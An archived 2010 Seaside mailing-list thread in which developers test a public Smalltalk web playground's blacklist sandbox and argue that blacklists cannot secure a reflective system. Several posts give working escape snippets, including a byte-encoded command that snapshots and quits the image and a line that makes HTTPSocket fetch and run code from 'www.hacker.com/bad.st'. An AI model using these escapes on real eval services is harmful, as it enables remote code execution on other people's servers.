Latest version should be really robust against hacks.
- undeclareds and signals are handled too Gerhard On Mon, Jan 11, 2010 at 12:22 PM, Germán Arduino <[hidden email]> wrote: Very interesting! _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
On Mon, 11 Jan 2010, Gerhard Obermann wrote:
> Latest version should be really robust against hacks. > Try this in squeak/pharo: { 'Compile', 'r eval', 'uate: ''se', 'lf inform: ''''broken''''''' } evalStrings Levente > - undeclareds and signals are handled too > > Gerhard > > > On Mon, Jan 11, 2010 at 12:22 PM, Germán Arduino <[hidden email]> wrote: > >> Very interesting! >> >> Thanks! >> >> 2010/1/10 Gerhard Obermann <[hidden email]>: >>> >>> Screenshot is attached! >>> >>> Gerhard >>> >>> _______________________________________________ >>> seaside mailing list >>> [hidden email] >>> http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside >>> >>> >> _______________________________________________ >> seaside mailing list >> [hidden email] >> http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside >> > seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
evalString(s) is now on the blacklist
Gerhard 2010/1/11 Levente Uzonyi <[hidden email]>
_______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
On Mon, 11 Jan 2010, Gerhard Obermann wrote:
> evalString(s) is now on the blacklist Try this: ((#class value: 1) compilerClass theMetaClass methodDict at: #evaluate:) valueWithReceiver: (#class value: 1) compilerClass arguments: { 'se', 'lf inform: ''broken''' } and let me know if it's available online. ;) Levente > > Gerhard > > 2010/1/11 Levente Uzonyi <[hidden email]> > >> On Mon, 11 Jan 2010, Gerhard Obermann wrote: >> >> Latest version should be really robust against hacks. >>> >>> >> Try this in squeak/pharo: >> { 'Compile', 'r eval', 'uate: ''se', 'lf inform: ''''broken''''''' } >> evalStrings >> >> >> Levente >> >> >> - undeclareds and signals are handled too >>> >>> Gerhard >>> >>> >>> On Mon, Jan 11, 2010 at 12:22 PM, Germán Arduino <[hidden email]> >>> wrote: >>> >>> Very interesting! >>>> >>>> Thanks! >>>> >>>> 2010/1/10 Gerhard Obermann <[hidden email]>: >>>> >>>>> >>>>> Screenshot is attached! >>>>> >>>>> Gerhard >>>>> >>>>> _______________________________________________ >>>>> seaside mailing list >>>>> [hidden email] >>>>> http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside >>>>> >>>>> >>>>> _______________________________________________ >>>> seaside mailing list >>>> [hidden email] >>>> http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside >>>> >>>> >> _______________________________________________ >> seaside mailing list >> [hidden email] >> http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside >> >> > seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
On Mon, 11 Jan 2010, Levente Uzonyi wrote:
> On Mon, 11 Jan 2010, Gerhard Obermann wrote: > >> evalString(s) is now on the blacklist > > Try this: > ((#class value: 1) compilerClass theMetaClass methodDict at: #evaluate:) > valueWithReceiver: (#class value: 1) compilerClass arguments: { 'se', 'lf > inform: ''broken''' } Oops, Array creation is not allowed, so I had to modify it a bit: | a | a := #(1). a at: 1 put: 'se', 'lf inform: ''broken'''. ((#class value: 1) compilerClass theMetaClass methodDict at: #evaluate:) valueWithReceiver: (#class value: 1) compilerClass arguments: a Levente > > and let me know if it's available online. ;) > > > Levente > >> >> Gerhard >> >> 2010/1/11 Levente Uzonyi <[hidden email]> >> >>> On Mon, 11 Jan 2010, Gerhard Obermann wrote: >>> >>> Latest version should be really robust against hacks. >>>> >>>> >>> Try this in squeak/pharo: >>> { 'Compile', 'r eval', 'uate: ''se', 'lf inform: ''''broken''''''' } >>> evalStrings >>> >>> >>> Levente >>> >>> >>> - undeclareds and signals are handled too >>>> >>>> Gerhard >>>> >>>> >>>> On Mon, Jan 11, 2010 at 12:22 PM, Germán Arduino <[hidden email]> >>>> wrote: >>>> >>>> Very interesting! >>>>> >>>>> Thanks! >>>>> >>>>> 2010/1/10 Gerhard Obermann <[hidden email]>: >>>>> >>>>>> >>>>>> Screenshot is attached! >>>>>> >>>>>> Gerhard >>>>>> >>>>>> _______________________________________________ >>>>>> seaside mailing list >>>>>> [hidden email] >>>>>> http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside >>>>>> >>>>>> >>>>>> _______________________________________________ >>>>> seaside mailing list >>>>> [hidden email] >>>>> http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside >>>>> >>>>> >>> _______________________________________________ >>> seaside mailing list >>> [hidden email] >>> http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside >>> >>> > seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
Its online!
http://obi.ath.cx:8080/examples/playground Gerhard 2010/1/11 Levente Uzonyi <[hidden email]>
_______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
Excellent, thanks by share!
2010/1/11 Gerhard Obermann <[hidden email]>: > Its online! > > http://obi.ath.cx:8080/examples/playground > > Gerhard > > > 2010/1/11 Levente Uzonyi <[hidden email]> >> >> On Mon, 11 Jan 2010, Levente Uzonyi wrote: >> >>> On Mon, 11 Jan 2010, Gerhard Obermann wrote: >>> >>>> evalString(s) is now on the blacklist >>> >>> Try this: >>> ((#class value: 1) compilerClass theMetaClass methodDict at: #evaluate:) >>> valueWithReceiver: (#class value: 1) compilerClass arguments: { 'se', 'lf >>> inform: ''broken''' } >> >> Oops, Array creation is not allowed, so I had to modify it a bit: >> >> | a | >> a := #(1). >> a at: 1 put: 'se', 'lf inform: ''broken'''. >> ((#class value: 1) compilerClass theMetaClass methodDict at: #evaluate:) >> valueWithReceiver: (#class value: 1) compilerClass arguments: a >> >> >> Levente >> >>> >>> and let me know if it's available online. ;) >>> >>> >>> Levente >>> >>>> >>>> Gerhard >>>> >>>> 2010/1/11 Levente Uzonyi <[hidden email]> >>>> >>>>> On Mon, 11 Jan 2010, Gerhard Obermann wrote: >>>>> >>>>> Latest version should be really robust against hacks. >>>>>> >>>>>> >>>>> Try this in squeak/pharo: >>>>> { 'Compile', 'r eval', 'uate: ''se', 'lf inform: ''''broken''''''' } >>>>> evalStrings >>>>> >>>>> >>>>> Levente >>>>> >>>>> >>>>> - undeclareds and signals are handled too >>>>>> >>>>>> Gerhard >>>>>> >>>>>> >>>>>> On Mon, Jan 11, 2010 at 12:22 PM, Germán Arduino <[hidden email]> >>>>>> wrote: >>>>>> >>>>>> Very interesting! >>>>>>> >>>>>>> Thanks! >>>>>>> >>>>>>> 2010/1/10 Gerhard Obermann <[hidden email]>: >>>>>>> >>>>>>>> >>>>>>>> Screenshot is attached! >>>>>>>> >>>>>>>> Gerhard >>>>>>>> >>>>>>>> _______________________________________________ >>>>>>>> seaside mailing list >>>>>>>> [hidden email] >>>>>>>> http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside >>>>>>>> >>>>>>>> >>>>>>>> _______________________________________________ >>>>>>> >>>>>>> seaside mailing list >>>>>>> [hidden email] >>>>>>> http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside >>>>>>> >>>>>>> >>>>> _______________________________________________ >>>>> seaside mailing list >>>>> [hidden email] >>>>> http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside >>>>> >>>>> >> >> _______________________________________________ >> seaside mailing list >> [hidden email] >> http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside >> > > > _______________________________________________ > seaside mailing list > [hidden email] > http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside > > -- ================================================= Germán S. Arduino <gsa @ arsol.net> Twitter: garduino Arduino Software & Web Hosting http://www.arduinosoftware.com PasswordsPro http://www.passwordspro.com ================================================= _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
In reply to this post by Gerhard Obermann
Gerhard this is really cool.
I have a couple of students that are just started to play with seaside and this is great! We will try on them :) Stef On Jan 10, 2010, at 8:59 AM, Gerhard Obermann wrote: > > Screenshot is attached! > > Gerhard > <Screen.png>_______________________________________________ > seaside mailing list > [hidden email] > http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
Thanks!
A lot of functionality will be added the next few days! I am open for suggestions too. Gerhard On Mon, Jan 11, 2010 at 8:22 PM, stephane ducasse <[hidden email]> wrote: Gerhard this is really cool. _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
In reply to this post by Lukas Renggli
Lukas
could they use your trick with using the debugger to interpret bytecode you did years ago. Stef On Jan 11, 2010, at 10:13 AM, Lukas Renggli wrote: >> Thats not a simple hack. >> And it doesn't really take over the computer. > > Sure. As soon as I can execute arbitrary Smalltalk code on your > machine, i can deploy a Trojan for your platform. > >> Anyway, such hacks are not possible anymore. > > There is an infinite number of other hacks. It gets harder over time, > but the one below is particularly simple: > > html evaluateUnloggedForSelf: #[34 73 110 115 116 97 108 108 32 116 > 104 101 32 102 97 118 111 114 105 116 101 32 116 114 111 121 97 110 34 > 32 83 109 97 108 108 116 97 108 107 73 109 97 103 101 32 99 117 114 > 114 101 110 116 32 115 110 97 112 115 104 111 116 58 32 102 97 108 115 > 101 32 97 110 100 81 117 105 116 58 32 116 114 117 101] asString > > My point is that no matter how much time you spend on making it secure > by checking for particular patterns or strings, there will always be > ways to fool it. In the Smalltalk world security is inherently weak, > mostly because of the strong reflective capabilities. I would really > love to see you application on the web, but in its current form we > won't be able to run it on seaside.st. > > Lukas > > -- > Lukas Renggli > http://www.lukas-renggli.ch > _______________________________________________ > seaside mailing list > [hidden email] > http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside > _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
In reply to this post by Gerhard Obermann
It has been removed in pharo 1.1
We slowly want to pay attention to these kind of simple and useless way to break a smalltalkimage Stef On Jan 11, 2010, at 1:51 PM, Gerhard Obermann wrote: > evalString(s) is now on the blacklist > > Gerhard > > 2010/1/11 Levente Uzonyi <[hidden email]> > On Mon, 11 Jan 2010, Gerhard Obermann wrote: > > Latest version should be really robust against hacks. > > > Try this in squeak/pharo: > { 'Compile', 'r eval', 'uate: ''se', 'lf inform: ''''broken''''''' } evalStrings > > > Levente > > > - undeclareds and signals are handled too > > Gerhard > > > On Mon, Jan 11, 2010 at 12:22 PM, Germán Arduino <[hidden email]> wrote: > > Very interesting! > > Thanks! > > 2010/1/10 Gerhard Obermann <[hidden email]>: > > Screenshot is attached! > > Gerhard > > _______________________________________________ > seaside mailing list > [hidden email] > http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside > > > _______________________________________________ > seaside mailing list > [hidden email] > http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside > > > _______________________________________________ > seaside mailing list > [hidden email] > http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside > > > _______________________________________________ > seaside mailing list > [hidden email] > http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
In reply to this post by stephane ducasse
> could they use your trick with using the debugger to interpret bytecode you did years ago.
Yes, that would make it slightly more secure, because one could also check also the calls within the code and the receivers and arguments. As with all the previous improvements, this will just make it slightly more time consuming to find a working exploit. A highly reflective and unsecured system like Smalltalk cannot be protected like that. If the language doesn't provide the infrastructure to be secure (for example through immutable objects, special execution environments, etc.) this is not reasonably possible Lukas -- Lukas Renggli http://www.lukas-renggli.ch _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
I asked gwenael to see what can be done with his infrastructure and after the tools deadline I will really ask him
to use it as a casestudy. same for jean-baptiste stef On Jan 12, 2010, at 10:12 AM, Lukas Renggli wrote: >> could they use your trick with using the debugger to interpret bytecode you did years ago. > > Yes, that would make it slightly more secure, because one could also > check also the calls within the code and the receivers and arguments. > As with all the previous improvements, this will just make it slightly > more time consuming to find a working exploit. A highly reflective and > unsecured system like Smalltalk cannot be protected like that. If the > language doesn't provide the infrastructure to be secure (for example > through immutable objects, special execution environments, etc.) this > is not reasonably possible > > Lukas > > -- > Lukas Renggli > http://www.lukas-renggli.ch > _______________________________________________ > seaside mailing list > [hidden email] > http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside > _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
In reply to this post by Lukas Renggli
Hi,
Maybe a whitelist approach would be better than the black list used now? There are so many ways that it is virtually impossible to write a complete black list. It took me a while, but I finally managed to browse arbitrary code in the image, including the blacklist (implemented by #isSecure:). Knowing how this method is implemented makes it pretty easy to come up with a new exploit: (nil environment at: ('https' asUppercase , 'ocket') asSymbol) httpFileIn: 'http://www.hacker.com/bad.st' This one allows you to load and run arbitrary code. HTH, Adrian On Jan 12, 2010, at 10:12 , Lukas Renggli wrote: >> could they use your trick with using the debugger to interpret bytecode you did years ago. > > Yes, that would make it slightly more secure, because one could also > check also the calls within the code and the receivers and arguments. > As with all the previous improvements, this will just make it slightly > more time consuming to find a working exploit. A highly reflective and > unsecured system like Smalltalk cannot be protected like that. If the > language doesn't provide the infrastructure to be secure (for example > through immutable objects, special execution environments, etc.) this > is not reasonably possible > > Lukas > > -- > Lukas Renggli > http://www.lukas-renggli.ch > _______________________________________________ > seaside mailing list > [hidden email] > http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside _______________________________________________ seaside mailing list [hidden email] http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside |
Free forum by Nabble | Edit this page |